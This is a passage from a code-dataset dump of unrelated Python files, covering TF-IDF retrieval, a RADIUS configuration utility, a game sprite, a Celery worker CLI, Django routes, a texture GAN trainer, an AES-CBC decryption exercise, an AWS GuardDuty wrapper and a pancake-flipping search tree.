mapping the filename of each\n `.txt` file inside that directory to the file's contents as a string.\n \"\"\"\n files = dict()\n corpus_path = os.path.join(\".\", directory)\n corpus_files = os.listdir(corpus_path)\n\n # I'm assuming all are txt. If not, simple IF will do the filtering\n for txt in corpus_files:\n string_file = \"\"\n with open(os.path.join(corpus_path, txt)) as f:\n string_file = f.read()\n files[txt] = string_file\n\n return files\n\ndef tokenize(document):\n \"\"\"\n Given a document (represented as a string), return a list of all of the\n words in that document, in order.\n\n Process document by coverting all words to lowercase, and removing any\n punctuation or English stopwords.\n \"\"\"\n tokenizer = RegexpTokenizer(r'\\w+')\n stopwords = nltk.corpus.stopwords.words(\"english\")\n lemmatizer = nltk.wordnet.WordNetLemmatizer()\n stemmer = nltk.stem.SnowballStemmer('english')\n # Get lowercase and rid of apostrophes\n text = document.lower().replace(\"\\n\", \" \").replace(\"”\", \" \").replace(\"“\", \" \").replace(\" ’\", \" \").replace(\" ‘\", \" \")\n\n # Get rid of punctuation and uppercase\n tokens = tokenizer.tokenize(text)\n # Get rid of stopwords\n for word in tokens:\n if word in stopwords:\n tokens.remove(word)\n \n # Get rid of single characters\n for word in tokens:\n if len(word) < 2:\n tokens.remove(word)\n \n # Convert numbers to text [Not using it as it leaves phrases as words, should check]\n \"\"\"for word in tokens:\n if word.isnumeric():\n tokens[tokens.index(word)] = num2words(word)\"\"\"\n\n\n # Lemmatize words \n for word in tokens:\n tokens[tokens.index(word)] = lemmatizer.lemmatize(word)\n\n # Stem words\n for word in tokens:\n tokens[tokens.index(word)] = stemmer.stem(word)\n\n return tokens\n\n\ndef compute_idfs(documents):\n \"\"\"\n Given a dictionary of `documents` that maps names of documents to a list\n of words, return a dictionary that maps words to their IDF values.\n\n Any word that appears in at least one of the documents should be in the\n resulting dictionary.\n \"\"\"\n words = dict()\n for doc in documents:\n tokens = documents[doc]\n checked_words = set()\n for word in tokens:\n if word in checked_words:\n continue\n if word in words:\n words[word] += 1\n checked_words.add(word)\n else:\n words[word] = 1\n checked_words.add(word)\n for word in words:\n # idf(t) = log(NumberOfDocs/(DocsAppearing))\n words[word] = math.log(len(documents) / words[word])\n\n return words\n\n\ndef top_files(query, files, idfs, n):\n \"\"\"\n Given a `query` (a set of words), `files` (a dictionary mapping names of\n files to a list of their words), and `idfs` (a dictionary mapping words\n to their IDF values), return a list of the filenames of the the `n` top\n files that match the query, ranked according to tf-idf.\n \"\"\"\n # TF-IDF = NumberOfAppearencesInDocument * IDF_Value\n tf_idf = dict()\n for document in files:\n tf_idf[document] = 0\n tokens = files[document]\n for word in query:\n if idfs.get(word) is None:\n continue\n appeareances = 0\n for token in tokens:\n if word == token:\n appeareances += 1\n tf_idf[document] += (appeareances * idfs[word])\n\n tf_idf = sorted(tf_idf.items(), key=lambda x: x[1], reverse=True)\n result = list()\n for document in range (0, n):\n result.append(tf_idf[document][0])\n return result\n\n\ndef top_sentences(query, sentences, idfs, n):\n \"\"\"\n Given a `query` (a set of words), `sentences` (a dictionary mapping\n sentences to a list of their words), and `idfs` (a dictionary mapping words\n to their IDF values), return a list of the `n` top sentences that match\n the query, ranked according to idf. If there are ties, preference should\n be given to sentences that have a higher query term density.\n \"\"\"\n matches = dict()\n for sentence in sentences:\n match_counter = total_counter = idf_counter = 0\n idf_counted_words = set()\n for word in sentences[sentence]:\n total_counter += 1\n if word in query:\n match_counter += 1\n if word not in idf_counted_words:\n idf_counter += idfs[word]\n idf_counted_words.add(word)\n # We save idf count and density, in case its needed\n if idf_counter != 0 and match_counter/total_counter != 0:\n matches[sentence] = (idf_counter, match_counter / total_counter)\n\n matches = sorted(matches.items(), key=lambda x: x[1], reverse=True)\n result = list()\n for document in range (0, n):\n result.append(matches[document][0])\n return result\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"7_Language/questions/questions.py","file_name":"questions.py","file_ext":"py","file_size_in_byte":6359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"74766919","text":"#!/usr/bin/env python3\n\n# Copyright 2018 Brocade Communications Systems LLC. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may also obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\n\n:mod:`radius_server_set` - PyFOS util to modify a RADIUS server configuration.\n*******************************************************************************\nThe :mod:`radius_server_create` util supports modifying a RADIUS \\\nserver configuration.\n\nThis module is a stand-alone script and API that can be used to modify a\nRADIUS server configuration.\n\n* Input:\n\n| Infrastructure Options:\n\n| -i,--ipaddr=IPADDR The IP address of the FOS switch.\n| -L,--login=LOGIN The login name.\n| -P,--password=PASSWORD The password.\n| -f,--vfid=VFID The VFID to which the request \\\n is directed [OPTIONAL].\n| -s,--secured=MODE The HTTPS mode \"self\" or \"CA\" [OPTIONAL].\n| -v,--verbose Verbose mode [OPTIONAL].\n\n* Util Script Options:\n --server Sets the RADIUS server name or IP address.\n --port Sets the RADIUS server port number.\n --timeout Sets the RADIUS server timeout value.\n --authentication Sets the RADIUS server authentication type.\n --secret Sets the RADIUS server secret type.\n --encryption-type Sets the RADIUS server encryption type.\n --position Sets the RADIUS server position.\n\n* Output:\n * A success response or a dictionary in case of error.\n\n\"\"\"\n\nimport sys\nfrom pyfos import pyfos_auth\nfrom pyfos import pyfos_util\nfrom pyfos.pyfos_brocade_security import radius_server\nfrom pyfos.utils import brcd_util\n\n\ndef main(argv):\n filters = [\"server\", \"port\", \"timeout\", \"authentication\",\n \"secret\", \"encryption_type\", \"position\"]\n inputs = brcd_util.parse(argv, radius_server, filters)\n\n radius_obj = inputs['utilobject']\n\n if radius_obj.peek_server() is None:\n print(\"Missing command line options\")\n print(inputs['utilusage'])\n exit(1)\n\n if not (radius_obj.peek_port() or\n radius_obj.peek_timeout() or radius_obj.peek_authentication() or\n radius_obj.peek_secret() or radius_obj.peek_encryption_type() or\n radius_obj.peek_position()):\n print(\"Missing command line options\")\n print(inputs['utilusage'])\n exit(1)\n\n # Login to switch\n session = brcd_util.getsession(inputs)\n\n result = radius_obj.patch(session)\n pyfos_util.response_print(result)\n\n # Log out\n pyfos_auth.logout(session)\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"pyfos/utils/system_security/radius_server_set.py","file_name":"radius_server_set.py","file_ext":"py","file_size_in_byte":3079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"370481876","text":"import pygame\r\nimport math\r\n\r\nclass spear:\r\n def __init__(self, parent):\r\n self.image = pygame.image.load('spear.png')\r\n self.parent = parent\r\n self.rect = self.image.get_rect()\r\n self.inAttack = False\r\n self.attackStart = 0\r\n self.animationLength = 0.3 * 1000 # Milliseconds\r\n self.animationDistance = 10\r\n\r\n def draw(self, surface):\r\n posX = self.parent.x\r\n posY = self.parent.y\r\n\r\n # Adjust in a direction +90 degrees to the direction pointed at\r\n posX += math.sin(math.radians(self.parent.angle + 90)) * 80\r\n posY += math.cos(math.radians(self.parent.angle + 90)) * 80\r\n\r\n # Animation\r\n if self.inAttack:\r\n posX -= math.sin(math.radians(self.parent.angle)) * 60\r\n posY -= math.cos(math.radians(self.parent.angle)) * 60\r\n\r\n if self.inAttack:\r\n time = pygame.time.get_ticks() - self.attackStart\r\n if time >= self.animationLength:\r\n self.inAttack = False\r\n\r\n rotImage = pygame.transform.rotate(self.image, self.parent.angle)\r\n rotRect = rotImage.get_rect(center=self.parent.rect.center)\r\n surface.blit(rotImage, (posX + rotRect.x, posY + rotRect.y))\r\n\r\n def attack(self):\r\n if self.inAttack:\r\n return\r\n self.attackStart = pygame.time.get_ticks()\r\n self.inAttack = True","sub_path":"combatSystem/spear.py","file_name":"spear.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"123553008","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.15-x86_64/egg/wavescli/cli.py\n# Compiled at: 2020-04-24 10:20:39\n# Size of source mod 2**32: 4136 bytes\nimport os, json, yaml, subprocess, click\nfrom wavescli import VERSION\n\n@click.group()\n@click.pass_context\n@click.version_option(version=VERSION)\ndef main(ctx):\n WAVES_URL = os.environ.get('WAVES_URL')\n API_KEY = os.environ.get('API_KEY')\n ctx.obj['config'] = {'WAVES_URL':WAVES_URL, \n 'API_KEY':API_KEY}\n\n\n@main.command(name='create')\n@click.option('--workflow/--businesstask', required=True, default=True)\n@click.argument('yaml_filepath', required=True, type=(click.File('r')))\n@click.pass_context\ndef create(ctx, workflow, yaml_filepath):\n \"\"\"\n Create a workflow/business task from a YAML file\n \"\"\"\n definition_str = yaml_filepath.read()\n if workflow and definition_str:\n click.secho(' Creating workflow...', fg='green')\n output = ctx.obj.client.create_workflow(definition_str)\n else:\n if not workflow:\n if definition_str:\n click.secho(' Creating businesstask...', fg='green')\n output = ctx.obj.client.register_businesstask(definition_str)\n click.secho(json.dumps(output, indent=2, sort_keys=True), fg='yellow')\n\n\n@main.command(name='publish')\n@click.option('--businesstask', is_flag=True)\n@click.argument('yaml_filepath', required=True, type=(click.File('r')))\n@click.pass_context\ndef publish(ctx, businesstask, yaml_filepath):\n \"\"\"\n Publish a business task from a YAML file\n \"\"\"\n definition_str = yaml_filepath.read()\n if businesstask:\n if definition_str:\n click.secho(' Publishing businesstask...', fg='green')\n new_btask = ctx.obj.client.publish_businesstask(definition_str)\n click.secho(json.dumps(new_btask, indent=2, sort_keys=True), fg='yellow')\n\n\n@main.command(name='worker')\n@click.option('--start/--stop', required=True, default=True)\n@click.option('--tasks', required=False, help='The path for the business task tasks.py file')\n@click.argument('yaml_filepath', required=True, type=(click.File('rb')))\ndef worker(start, tasks, yaml_filepath):\n \"\"\"\n Start/Stop worker to receiving messages from Waves broker\n \"\"\"\n definition = yaml.load(yaml_filepath, Loader=(yaml.FullLoader))\n if start and definition:\n start_worker(definition, tasks)\n else:\n stop_worker(definition, tasks)\n\n\ndef start_worker(definition, tasks):\n task_name = definition.get('name')\n task_version = definition.get('version', 'latest')\n tasks_module = definition.get('tasks_module', 'waves.btasks.app')\n if tasks:\n tasks_module = tasks\n default_queue = 'wv_{}@{}'.format(task_name, task_version)\n loglevel = 'INFO'\n concurrency = os.environ.get('CELERY_CONCURRENCY', 1)\n queue = os.environ.get('QUEUE_NAME', default_queue)\n worker_name = os.environ.get('WORKER_PRIVATE_IP', '%h')\n cmd = 'celery -A {} worker --hostname {}@{} --loglevel={} --task-events -Ofair -c {} -Q {}'.format(tasks_module, task_name, worker_name, loglevel, concurrency, queue)\n click.secho((' ...Starting worker\\n{}'.format(cmd)), fg='yellow')\n subprocess.call(cmd.split(' '))\n\n\ndef stop_worker(definition, tasks):\n tasks_module = definition.get('tasks_module', 'waves.btasks.app')\n if tasks:\n tasks_module = tasks\n cmd = 'celery -A {} control shutdown'.format(tasks_module)\n click.secho((' ...Stopping worker\\n{}'.format(cmd)), fg='yellow')\n subprocess.call(cmd.split(' '))\n\n\n@main.command(name='init')\n@click.option('--project', type=click.Choice(['New', 'Existing'], case_sensitive=False),\n prompt=True)\ndef worker_init(project):\n \"\"\"\n Add waves files\n cookiecutter https://gitlab.spacetimeanalytics.com/waves/bt-template.git -c existing\n \"\"\"\n click.secho((' ...project{}'.format(project)), fg='yellow')\n template = 'https://gitlab.spacetimeanalytics.com/waves/bt-template.git'\n existing_project = project.upper() == 'EXISTING'\n cmd = 'cookiecutter {}{}'.format(template, ' -f -c existing' if existing_project else '')\n click.secho(\" ...Initializing Waves' files\\n\", fg='yellow')\n subprocess.call(cmd.split(' '))","sub_path":"pycfiles/wavescli-0.0.42-py3.7/cli.cpython-37.py","file_name":"cli.cpython-37.py","file_ext":"py","file_size_in_byte":4342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"355241241","text":"#solving a set of linear equations using python library\n\nimport numpy as np\n\nA=np.array([[1,0.67,0.33],[0.45,1,0.55],[0.67,0.33,1]])\nB=np.array([2,2,2])\nx=np.linalg.solve(A,B)\nprint(x)\n\n\n\n\n","sub_path":"linalg_solve.py","file_name":"linalg_solve.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"28578264","text":"from django.urls import path\nfrom . import views\nfrom django.contrib.auth import views as auth_views\n\napp_name = 'movieee'\nurlpatterns = [\n path('', views.index, name='index'),\n path('posts/new/', views.posts_new, name='posts_new'),\n path('posts//', views.posts_detail, name='posts_detail'),\n path('posts//edit/', views.posts_edit, name='posts_edit'),\n path('posts//delete/', views.posts_delete, name='posts_delete'),\n path('posts//comments_add/', views.comments_add, name='comments_add'),\n]","sub_path":"movieee/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"259880980","text":"import argparse\nimport json\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport os\nimport random\nimport sys\nimport time\nimport yaml\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\n\nfrom ailive import DEVICE\nfrom ailive.data import TextureDataset, LiveDataset\nfrom ailive.models import Generator, Discriminator, setWave, setNoise\nfrom ailive.config import Struct\nfrom ailive.generate import generate\nfrom ailive.config import cf\n\nfrom shu import shu\nfrom shu.core.db import db\n\n\nmatplotlib.use('Agg')\ncudnn.benchmark = True\n\n\nclass Logger:\n \"\"\"\n Class to log weights during training.\n :param model: model whose weights should be logged\n :param save_: path to checkpoint directory\n \"\"\"\n def __init__(self,\n model,\n save_):\n\n self.model = model\n self.save_ = save_\n self.variables = [x for x in self.model.state_dict().keys()]\n\n def init(self):\n \"\"\"\n Initialize logger by setting up weight dictionaries\n \"\"\"\n self.save_dict = dict(zip(self.variables,\n [[] for _ in self.variables]))\n self.index_dict = {}\n\n for var_ in self.variables:\n tensor_ = self.model.state_dict()[var_].view(-1)\n len_ = len(tensor_)\n ix = [random.choice(range(len_)) for _ in range(5)]\n self.index_dict[var_] = ix\n\n def dump(self):\n \"\"\"\n Print logger to .json file with path in self.save_\n \"\"\"\n with open(self.save_ + \"/weights.json\", \"w\") as f:\n json.dump(self.save_dict, f)\n\n def log(self):\n \"\"\"\n Log weights into weight dictionaries at some point in training.\n \"\"\"\n for var_ in self.variables:\n tensor_ = self.model.state_dict()[var_].view(-1)\n to_append = [float(tensor_[choice])\n for choice in self.index_dict[var_]]\n self.save_dict[var_].append(to_append)\n if len(self.save_dict[var_]) > 1000:\n self.save_dict[var_] = \\\n self.save_dict[var_][-1000:]\n\n\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n m.weight.data.normal_(0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n m.weight.data.normal_(1.0, 0.02)\n m.bias.data.fill_(0)\n\n\ndef get_configs(path, dataroot, name):\n with open(path) as f:\n cf = yaml.load(f, Loader=yaml.FullLoader)\n\n cf['train']['dataroot'] = dataroot\n return Struct(**cf['train']), \\\n Struct(**cf['generator']), \\\n Struct(**cf['discriminator'])\n\n\nclass Trainer:\n def __init__(self, shu_name, train_cf, gen_cf, dis_cf):\n\n if shu_name[-1] != '/':\n shu_name += '/'\n self.shu_name = shu_name\n self.train_cf = train_cf\n self.gen_cf = gen_cf\n self.dis_cf = dis_cf\n self.epoch = 0\n self.it = 0\n self.glance_dir = 'glances/' + self.shu_name\n\n os.system(f'mkdir -p {self.glance_dir}')\n\n self._init_seed()\n self.transform = self._init_transforms()\n if train_cf.fRec > 0:\n self.recon = True\n self.netD, self.netG, self.netR = self._init_model()\n else:\n self.recon = False\n self.netD, self.netG = self._init_model()\n self._init_weights()\n if self.train_cf._get('load', False):\n self._load_weights()\n self.optimizerD, self.optimizerG = self._get_optimizers()\n self.dataloader, self.dataset, self.cdataset = self._get_data()\n self.criterion = nn.BCELoss()\n self.logger = Logger(self.netG, 'checkpoints/' + self.shu_name)\n self.logger.init()\n\n nz_other = train_cf.imageSize // 2 ** gen_cf.nDep\n self.noise = torch.FloatTensor(train_cf.batchSize,\n gen_cf.nz,\n nz_other,\n nz_other).to(DEVICE)\n self.noise = setNoise(self.noise, nGL=self.gen_cf.nGL)\n\n self.label = torch.FloatTensor(train_cf.batchSize).to(DEVICE)\n self.REAL_LABEL = 1\n self.FAKE_LABEL = 0\n\n def _init_seed(self):\n random.seed(self.train_cf._get('manualSeed', int(time.time())))\n torch.manual_seed(self.train_cf._get('manualSeed', int(time.time())))\n\n def _init_transforms(self):\n return transforms.Compose([\n transforms.RandomCrop(self.train_cf.imageSize),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n ])\n\n def _init_model(self):\n netD = Discriminator(self.dis_cf.ndf, self.gen_cf.nDep)\n netG = Generator(\n self.gen_cf.ngf,\n self.gen_cf.nDep,\n self.gen_cf.nz,\n self.gen_cf.nGL,\n Ctype=self.gen_cf.Ctype,\n nPeriodic=self.gen_cf.nperiodic,\n nc=self.gen_cf.nc,\n Kperiodic=self.gen_cf.Kperiodic\n )\n netD.to(DEVICE)\n netG.to(DEVICE)\n if self.recon:\n netR = Reconstructor(gen_cf.ndf, gen_cf.nDep, gen_cf.nGL)\n netR.to(DEVICE)\n return netD, netG, netR\n else:\n return netD, netG\n\n def _init_weights(self):\n self.netD.apply(weights_init)\n self.netG.apply(weights_init)\n if self.recon:\n self.netR.apply(weights_init)\n\n def _load_weights(self):\n self.netG.load_state_dict(torch.load(train_cf.load))\n\n def _get_optimizers(self):\n optimizerD = optim.Adam(\n self.netD.parameters(),\n lr=self.train_cf.lr,\n betas=(self.train_cf.beta1, 0.999)\n )\n\n if self.recon:\n optimizerG = optim.Adam(\n list(self.netG.parameters()) + list(self.netR.parameters()),\n lr=self.train_cf.lr,\n betas=(self.train_cf.beta1, 0.999)\n )\n else:\n optimizerG = optim.Adam(\n self.netG.parameters(),\n lr=self.train_cf.lr,\n betas=(self.train_cf.beta1, 0.999)\n )\n return optimizerD, optimizerG\n\n def _get_data(self):\n dataset = TextureDataset(self.train_cf.dataroot, self.transform)\n cdataset = LiveDataset(self.train_cf.audio_path,\n self.train_cf.batchSize)\n dataloader = torch.utils.data.DataLoader(\n dataset, batch_size=self.train_cf.batchSize,\n shuffle=True,\n num_workers=1\n )\n return dataloader, dataset, cdataset\n\n def _take_discriminator_step(self):\n self.netD.zero_grad()\n output = self.netD(self.text)\n errD_real = \\\n self.criterion(output, output.detach() * 0 + self.REAL_LABEL)\n errD_real.backward()\n self.D_x = output.mean().item()\n with torch.no_grad():\n fake = self.netG(self.noise)\n output = self.netD(fake.detach())\n errD_fake = \\\n self.criterion(output, output.detach() * 0 + self.FAKE_LABEL)\n errD_fake.backward()\n self.D_G_z1 = output.mean().item()\n errD = errD_real + errD_fake\n self.optimizerD.step()\n\n def _take_generator_step(self):\n self.optimizerG.zero_grad()\n self.content = self.cdataset.next().to(DEVICE)\n self.noise = setNoise(self.noise, audio=self.content, nGL=self.gen_cf.nGL)\n self.fake = self.netG(self.noise)\n output = self.netD(self.fake)\n if self.recon:\n recZ = self.netR(self.fake)\n errR = \\\n (((recZ - self.noise[:, :self.gen_cf.nGL, :1, :1])) ** 2).mean()\n else:\n errR = self.noise.sum() * 0\n errG = self.criterion(output, output.detach() * 0 + self.REAL_LABEL) + \\\n self.train_cf.fRec * errR\n errG.backward()\n D_G_z2 = output.mean().item()\n self.optimizerG.step()\n\n def _make_glances(self):\n\n vutils.save_image(\n self.text * 0.5 + 0.5,\n f'{self.glance_dir}/real_textures.jpg',\n normalize=False\n )\n vutils.save_image(\n self.content * 0.5 + 0.5,\n f'{self.glance_dir}/real_contents.jpg',\n normalize=False\n )\n vutils.save_image(\n self.fake * 0.5 + 0.5,\n f'{self.glance_dir}/tex_{self.epoch:03}.jpg',\n normalize=False\n )\n\n n2 = self.noise[:4].repeat(1, 1, 3, 3)\n n2 = setNoise(n2, audio=self.content[:4], nGL=self.gen_cf.nGL)\n self.netG.eval()\n with torch.no_grad():\n fake2 = self.netG(n2)\n self.netG.train()\n vutils.save_image(\n fake2 * 0.5 + 0.5,\n f'{self.glance_dir}/tex2_{self.epoch:03}.jpg',\n normalize=False,\n )\n\n glance = {\"tex\": f'/static/{self.glance_dir}tex_{self.epoch:03}.jpg'}\n print(f'GLANCE 0 iteration: {self.it}; data: {json.dumps(glance)};')\n glance = {\"tex2\": f'/static/{self.glance_dir}tex2_{self.epoch:03}.jpg'}\n print(f'GLANCE 1 iteration: {self.it}; data: {json.dumps(glance)};')\n\n if self.gen_cf.nperiodic > 0:\n n2 = setWave(n2, self.gen_cf.nperiodic, self.netG)\n vutils.save_image(\n n2.view(-1, 1, n2.shape[2], n2.shape[3]) * .5 + 0.5,\n f'{self.glance_dir}/noise2_{self.epoch:03}.jpg',\n normalize=False,\n )\n\n glance = {\"noise2\":\n f'/static/{self.glance_dir}noise2_{self.epoch:03}.jpg'}\n print(f'GLANCE 2 iteration: {self.it}; data: {json.dumps(glance)};')\n\n waves = n2[:, n2.shape[1] - self.gen_cf.nperiodic:].contiguous()\n waves = waves.view(-1, 1, n2.shape[2], n2.shape[3])\n vutils.save_image(\n waves * .5 + 0.5,\n f'{self.glance_dir}/waves_{self.epoch:03}.jpg',\n normalize=False,\n )\n glance = {\"waves\":\n f'/static/{self.glance_dir}waves_{self.epoch:03}.jpg'}\n print(f'GLANCE 3 iteration: {self.it}; data: {json.dumps(glance)};')\n\n def _save_model(self):\n print('saving...')\n torch.save(self.netG.state_dict(),\n f'checkpoints/{self.shu_name}/model.pt')\n self.logger.dump()\n\n def _do_iteration(self, batch):\n content = self.cdataset.next().to(DEVICE)\n self.text, _ = batch\n self.text = self.text.to(DEVICE)\n self.noise = setNoise(self.noise, audio=content, nGL=self.gen_cf.nGL)\n\n self._take_discriminator_step()\n self._take_generator_step()\n\n if self.it % 25 == 0:\n self.logger.log()\n\n if self.it % 5 == 0:\n print(f'TRAIN iteration: {self.it}; epoch: {self.epoch}; '\n f'd_loss: {self.D_x}; g_loss: {self.D_G_z1};')\n\n self.it += 1\n\n def _do_epoch(self):\n for batch in self.dataloader:\n self._do_iteration(batch)\n if self.epoch % 5 == 0:\n self._make_glances()\n self._save_model()\n self.epoch += 1\n\n def _create_video(self):\n generate(self.gen_cf, cf.audio, self.shu_name)\n if self.gen_cf.nperiodic > 0:\n n = 4\n else:\n n = 2\n to_print = json.dumps({'example': '/static/' + self.glance_dir + 'example.mp4'})\n print(f'GLANCE {n} iteration: {self.it}; data: {to_print};')\n\n def _push_data(self):\n version = str(db.instances.find_one({'name': 'ailive'})['version'])\n print('pushing training data to ailive server')\n shu.files.sync(version)\n shu.files.checkpoints(version, exclude='\"*\"', include='\"*/log\"')\n shu.files.data(version, exclude='\"data/audio/*\"')\n\n ims = os.listdir('data/images/' + self.shu_name)\n ims = ['/static/images/' + x for x in ims]\n\n r = {'name': self.shu_name, 'examples': ims, 'info': {}, 'project': 'ailive'}\n db.datasets.replace_one({'name': self.shu_name}, r, upsert=True)\n\n\n def train(self):\n for _ in range(self.train_cf.n_epochs):\n self._do_epoch()\n self._create_video()\n self._push_data()\n","sub_path":"ailive/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":12403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"183162534","text":"import base64\nimport hashlib\nfrom Crypto.Cipher import AES\nfrom Crypto import Random\n\nkey = \"YELLOW SUBMARINE\"\nblock_size = 16\n\n\ndef xor(s1,s2):\n\treturn ''.join(chr(a ^ b) for a,b in zip(s1,s2))\n\ndef decrypt(text):\n\tobj = AES.new( key , AES.MODE_ECB)\n\tplaintext = obj.decrypt(text)\n\treturn plaintext\n\t\nplaintext = \"\"\n\nwith open (\"C10.txt\", \"r\") as myfile:\n ciphertext = myfile.read().replace(\"\\n\",\"\")\n\nciphertext = base64.b64decode( ciphertext.rstrip()) # convert to ascii\nprint(len(ciphertext))\nprint( ciphertext[:5] )\n\nif len(ciphertext)%16!=0:\n\tprint(\"Error\")\nIV = (\"0\"*16).encode(\"ASCII\")\n\nwhile len(ciphertext)!=0:\n\tnext_block = ciphertext[:16]\n\tmi_c1 = decrypt(next_block)\n\tplaintext += xor(mi_c1,IV)\n\tIV = next_block\n\tciphertext = ciphertext[16:]\nplaintext += \"\\n\"\n\nprint(plaintext)\n\n","sub_path":"Crypto/Pals/C10.py","file_name":"C10.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"431846075","text":"#!/usr/bin/python\n# -*- codding: utf-8 -*-\nimport os\nimport sys\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\nfrom common.execute_command import write_two_parameter\n\n# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/guardduty/update-ip-set.html\nif __name__ == '__main__':\n \"\"\"\n\tcreate-ip-set : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/guardduty/create-ip-set.html\n\tdelete-ip-set : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/guardduty/delete-ip-set.html\n\tget-ip-set : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/guardduty/get-ip-set.html\n\tlist-ip-sets : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/guardduty/list-ip-sets.html\n \"\"\"\n\n parameter_display_string = \"\"\"\n # detector-id : The detectorID that specifies the GuardDuty service whose IPSet you want to update.\n # ip-set-id : The unique ID that specifies the IPSet that you want to update.\n \"\"\"\n add_option_dict = {}\n add_option_dict[\"parameter_display_string\"] = parameter_display_string\n # ex: add_option_dict[\"no_value_parameter_list\"] = \"--single-parameter\"\n write_two_parameter(\"guardduty\", \"update-ip-set\", \"detector-id\", \"ip-set-id\", add_option_dict)\n","sub_path":"guardduty_write_2/ip-set_update.py","file_name":"ip-set_update.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"513453965","text":"class Tree(object):\n def __init__(self, name='root', children=None):\n self.name = name\n self.children = []\n if children is not None:\n for child in children:\n self.add_child(child)\n\n def __repr__(self):\n return self.name\n\n def add_child(self, node):\n assert isinstance(node, Tree)\n self.children.append(node)\n\n\ndef generating_tree_new(node, current_depth):\n instances = 1\n if current_depth == 18:\n return node\n else:\n for flip in range(0, pancakes):\n flippancake(node, instances)\n instances = instances + 1\n for children in node.children:\n generating_tree_new(children, current_depth + 1)\n return node\n\n\ndef flippancake(tree, instance):\n original_name = tree.name\n temp_name = \"\"\n end_name = \"\"\n count = 0\n for j in range(0, instance):\n for k in range(1, len(original_name)):\n if original_name[k] == 'b':\n count = count + 1\n else:\n break\n count = count + 1\n temp_name = original_name[0:count]\n original_name = original_name[count:]\n if len(temp_name) == sides:\n temp_name = temp_name[0]\n else:\n temp_name = temp_name + 'b'\n end_name = temp_name + end_name\n temp_name = \"\"\n count = 0\n end_name = end_name + original_name\n end_name = Tree(end_name)\n tree.add_child(end_name)\n return tree\n\n\ndef generating_tree(node, current_depth):\n instances = 0\n count = 0\n # Checking if we are done doing the number of vertices and if so we just return the node we are at.\n if current_depth == 18:\n return node\n # iterate over the name\n for j in range(0, len(node.name)):\n # current implementation needs to be changed as this only works for 2 pancakes, because\n # when you have more than 2 pancakes you have to flip each time that it's not the top instance.\n # for instance if you had 3 pancakes with 3 sides and you are at state \"12b3b\" then it's children would be\n # \"1b2b3b\", \"2bb1b3b\", \"3bb2bb1b\"\n # so for now this will only work for 2 pancakes\n # This means we are at the first flip of the pancake so only doing 12 becoming 1b2\n if node.name[j] != \"b\" and instances == 0:\n # This just shows we are not at the first flip of the pancake\n instances += 1\n subname = node.name[j + 1:]\n for k in range(0, len(subname)):\n if subname[k] != \"b\":\n break\n else:\n count += 1\n if count == sides - 1:\n count = 0\n new_name = node.name[:j + 1] + node.name[j + sides:]\n new_name = Tree(new_name)\n new_name = generating_tree(new_name, current_depth + 1)\n node.add_child(new_name)\n else:\n count = 0\n new_name = node.name[:j + 1] + \"b\" + node.name[j + 1:]\n new_name = Tree(new_name)\n new_name = generating_tree(new_name, current_depth + 1)\n node.add_child(new_name)\n elif node.name[j] != \"b\" and instances != 0:\n subname = node.name[j + 1:]\n for k in range(0, len(subname)):\n if subname[k] != \"b\":\n break\n else:\n count += 1\n if count == sides - 1:\n # here\n new_name = node.name[:j + 1] + node.name[j + sides:]\n new_name = new_name[j:] + new_name[:j]\n count = 0\n subname = new_name[2:]\n for l in range(0, len(subname)):\n if subname[l] != \"b\":\n break\n else:\n count += 1\n if count == sides - 1:\n # blarg\n count = 0\n new_name = new_name[:1 + 1] + new_name[1 + sides:]\n new_name = Tree(new_name)\n new_name = generating_tree(new_name, current_depth + 1)\n node.add_child(new_name)\n else:\n # thing\n count = 0\n new_name = new_name[:1 + 1] + \"b\" + new_name[1 + 1:]\n new_name = Tree(new_name)\n new_name = generating_tree(new_name, current_depth + 1)\n node.add_child(new_name)\n else:\n # wow\n 